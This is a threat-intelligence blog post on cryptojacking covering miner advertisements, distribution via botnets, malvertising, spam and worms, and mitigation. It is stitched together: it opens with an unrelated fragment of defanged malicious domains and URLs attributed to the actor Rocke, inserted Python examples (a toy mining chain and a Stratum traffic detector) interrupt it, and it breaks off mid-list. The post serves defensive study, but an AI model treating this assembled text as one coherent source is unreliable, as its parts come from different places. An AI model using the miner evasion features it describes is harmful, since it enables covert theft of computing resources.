dazqc4f140wtl[.]cloudfront[.]net: file server
3g2upl4pq6kufc4m[.]tk: file server
d3goboxon32grk2l[.]tk: file server
enjoytopic[.]tk: file server
realtimenews[.]tk: file server
8282[.]space: older C2

Domains registered to Rocke (not all are necessarily malicious):



5-xun[.]com
88180585[.]com
firstomato[.]com
jxtiewei[.]com
ncyypx[.]net

URLs


hxxp://d20blzxlz9ydha[.]cloudfront[.]net/Install.exe
hxxp://www[.]amazon[.]com:80/N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=12275&s=3717&dc_ref=http%3A%2F%2Fwww.amazon.com
hxxp://www[.]amazon[.]com:80/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books

Hashes




How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.
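The hash chain, the difficulty target and the pooled nonce search sketched above, as an added toy implementation that is not code from the FireEye post; block headers are serialized as JSON and the difficulty is only a few bits so it runs in a fraction of a second (a real chain hashes a binary header and uses a far larger target).

```python
"""Toy proof-of-work chain illustrating the mining process described above.

Added example, not from the FireEye post. Difficulties are tiny so it runs
instantly; Bitcoin hashes a binary header with double SHA-256 and a target
that requires trillions of attempts, but the mechanics are the same.
"""
import hashlib
import json


def block_hash(prev_hash, transactions, nonce):
    """Hash a block header; the previous block's hash is what links the chain."""
    header = json.dumps({"prev": prev_hash, "tx": transactions, "nonce": nonce},
                        sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(header.encode()).hexdigest()


def meets_target(digest_hex, difficulty_bits):
    """A valid block hash must be below 2**(256 - difficulty_bits)."""
    return int(digest_hex, 16) < (1 << (256 - difficulty_bits))


def mine_block(prev_hash, transactions, difficulty_bits, start=0, step=1):
    """Try nonces start, start+step, ... until the hash meets the target.

    Returns (nonce, hash, attempts). A solo miner uses step=1; a pool gives
    each worker its own start offset and step=number_of_workers so the
    workers cover disjoint slices of the nonce space. Expected attempts
    are about 2**difficulty_bits regardless of who is searching.
    """
    nonce, attempts = start, 0
    while True:
        attempts += 1
        digest = block_hash(prev_hash, transactions, nonce)
        if meets_target(digest, difficulty_bits):
            return nonce, digest, attempts
        nonce += step


def pool_mine(prev_hash, transactions, difficulty_bits, workers):
    """Simulate a pool of equally fast workers: whoever needs the fewest
    attempts finds the block first, and that result is what the pool submits."""
    results = [mine_block(prev_hash, transactions, difficulty_bits, w, workers)
               for w in range(workers)]
    return min(results, key=lambda r: r[2])  # (nonce, hash, attempts) of the winner


def build_chain(batches, difficulty_bits):
    """Mine one block per transaction batch, each linked to its predecessor."""
    chain = []
    prev = "0" * 64  # genesis link
    for tx in batches:
        nonce, digest, _ = mine_block(prev, tx, difficulty_bits)
        chain.append({"prev": prev, "tx": tx, "nonce": nonce, "hash": digest})
        prev = digest
    return chain


def verify_chain(chain, difficulty_bits):
    """Recompute every hash and check each block's link to its predecessor.

    Changing any transaction changes that block's hash, which no longer
    matches the "prev" field of the next block, so the tampering is visible
    without re-mining every later block.
    """
    prev = "0" * 64
    for block in chain:
        if block["prev"] != prev:
            return False
        digest = block_hash(block["prev"], block["tx"], block["nonce"])
        if digest != block["hash"] or not meets_target(digest, difficulty_bits):
            return False
        prev = digest
    return True


if __name__ == "__main__":
    for bits in (8, 12, 16):
        _, _, attempts = mine_block("0" * 64, ["demo"], bits)
        print(f"{bits} difficulty bits: {attempts} attempts (expected about {2 ** bits})")
```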


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol and forked from Bytecoin. Unlike many cryptocurrencies, Monero uses a technology called "ring signatures," which mixes the signer's public key with other users' keys to eliminate the possibility of identifying a particular user, making transactions untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are infeasible to reveal through blockchain analysis, ensuring that Monero transactions cannot be linked while also being cryptographically secure.

The Monero blockchain also uses a "memory-hard" hashing algorithm called CryptoNight which, unlike Bitcoin's SHA-256, deters application-specific integrated circuit (ASIC) mining. This property is critical to the Monero developers and keeps CPU mining feasible and profitable. Because of these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-source tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities:

  • XMR-STACK
  • MINERGATE
  • XMRMINER
  • CCMINER
  • XMRIG
  • CLAYMORE
  • SGMINER
  • CAST XMR
  • LUKMINER
  • CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
    • Windows Task Manager
    • Process Killer
    • KillProcess
    • System Explorer
    • Process Explorer
    • AnVir
    • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU or network load could leave industrial infrastructure unresponsive, preventing operators from interacting with the controlled process in real time.

The electricity cost, measured in kilowatt-hours (kWh), depends on several factors: how often the malicious miner software is configured to run, how many threads it is configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that it consumed 1.212 kWh. They estimated that this equated to monthly electricity costs of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems

Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web Services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.

Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user's web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As the researchers pointed out, closing the browser window may not be enough to interrupt the activity, and more advanced actions, such as ending the process from the Task Manager, may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

  • california_540_tax_form_2013_instructions.exe
  • state_bank_of_india_money_transfer_agency.exe
  • format_transfer_sms_banking_bni_ke_bca.exe
  • confirmation_receipt_letter_sample.exe
  • sbi_online_apply_2015_po.exe
  • estimated_tax_payment_coupon_irs.exe
  • how_to_add_a_non_us_bank_account_to_paypal.exe
  • western_union_money_transfer_from_uk_to_bangladesh.exe
  • can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe
  • how_to_open_a_business_bank_account_with_bad_credit_history.exe
  • apply_for_sbi_credit_card_online.exe
  • list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • In April 2018, security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine has to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture in which clients send subscription requests to join a pool and servers send (publish) messages to their subscribed clients. These messages are simple, readable JSON-RPC messages. Subscription requests include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters
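The DPI rule just described, as an added Python example that is not FireEye's or Cato Networks' code: it parses a reassembled TCP stream as newline-delimited JSON-RPC, keeps only messages whose method belongs to a Stratum dialect, and flags the session once the client tries to join a pool. The sample stream, the miner agent strings and the wallet placeholder are constructed; the method names are the standard Stratum v1 methods and the login/getjob/submit dialect used by Monero pools and XMRig-style miners.

```python
import json
from typing import Dict, List, Optional

# Method names that appear in Stratum pool sessions. The "mining.*" family is
# the classic Bitcoin-derived dialect; "login"/"getjob"/"submit"/"keepalived"
# is the JSON-RPC dialect used by Monero pools and XMRig-style miners.
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty",
    "login", "getjob", "submit", "keepalived",
}


def classify_message(raw: bytes) -> Optional[Dict[str, object]]:
    """Return a detection record for one line of TCP payload, or None when
    the line is not a Stratum message. The check mirrors the DPI rule above:
    a JSON object carrying id, method and params with a known method name."""
    try:
        msg = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None                      # binary data, HTTP, or plain text
    if not isinstance(msg, dict) or "method" not in msg or "params" not in msg:
        return None
    method = msg["method"]
    if not isinstance(method, str) or method not in STRATUM_METHODS:
        return None                      # JSON-RPC, but not a mining dialect
    params = msg["params"]
    record: Dict[str, object] = {"id": msg.get("id"), "method": method,
                                 "agent": None, "account": None}
    # Pull out the fields an analyst pivots on: the miner's user agent and the
    # wallet/worker identifier the client authenticates with.
    if method == "mining.subscribe" and isinstance(params, list) and params:
        record["agent"] = params[0]
    elif method == "mining.authorize" and isinstance(params, list) and params:
        record["account"] = params[0]
    elif method == "login" and isinstance(params, dict):
        record["agent"] = params.get("agent")
        record["account"] = params.get("login")
    return record


def scan_stream(payload: bytes) -> List[Dict[str, object]]:
    """Split a reassembled TCP stream into newline-delimited messages and
    return every Stratum message found, in order."""
    hits: List[Dict[str, object]] = []
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line:
            continue
        rec = classify_message(line)
        if rec is not None:
            hits.append(rec)
    return hits


def is_mining_session(payload: bytes) -> bool:
    """Flag a stream as a mining session only once the client has tried to
    join a pool (subscribe/authorize or login); share submits alone are not
    enough, which keeps stray JSON-RPC traffic from triggering a block."""
    joins = {"mining.subscribe", "mining.authorize", "login"}
    return any(rec["method"] in joins for rec in scan_stream(payload))


# Constructed sample stream: both Stratum dialects mixed with unrelated
# traffic (an HTTP request, a non-mining JSON-RPC call, and garbage).
SAMPLE_STREAM = (
    b'{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.0"]}\n'
    b'{"id":2,"method":"mining.authorize","params":["WALLET_PLACEHOLDER.worker01","x"]}\n'
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/2.6.4"}}\n'
    b'GET /index.html HTTP/1.1\r\n'
    b'{"id":7,"method":"eth_blockNumber","params":[]}\n'
    b'not json at all\n'
)

if __name__ == "__main__":
    for rec in scan_stream(SAMPLE_STREAM):
        print(rec)
    print("mining session:", is_mining_session(SAMPLE_STREAM))
```

The same matching logic applies to Stratum carried over plain HTTP; it does not see inside TLS, which is the limitation the next section addresses.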

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

